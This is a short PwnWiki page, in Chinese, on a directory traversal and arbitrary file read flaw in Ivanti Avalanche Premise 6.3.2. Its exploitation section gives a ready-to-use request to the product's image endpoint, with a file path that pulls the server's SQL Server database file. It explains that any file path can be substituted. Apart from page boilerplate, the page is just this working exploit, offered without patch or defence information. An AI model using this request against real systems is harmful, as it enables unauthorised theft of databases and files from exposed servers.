Ivanti Avalanche 目录遍歷&任意文件讀取漏洞

From PwnWiki

Revision as of 09:50, 17 May 2021 by Pwnwiki (talk | contribs) (Created page with "==影響範圍== Avalanche Premise 6.3.2 for Windows v6.3.2.3490 ==漏洞利用== 訪問 <pre> https://IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響範圍

Avalanche Premise 6.3.2 for Windows v6.3.2.3490

漏洞利用

訪問

https://IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf

即可，imageFilePath=後面加文件的路徑。

Retrieved from "https://pwnwiki.com/index.php?title=Ivanti_Avalanche_目录遍歷%26任意文件讀取漏洞&oldid=2881"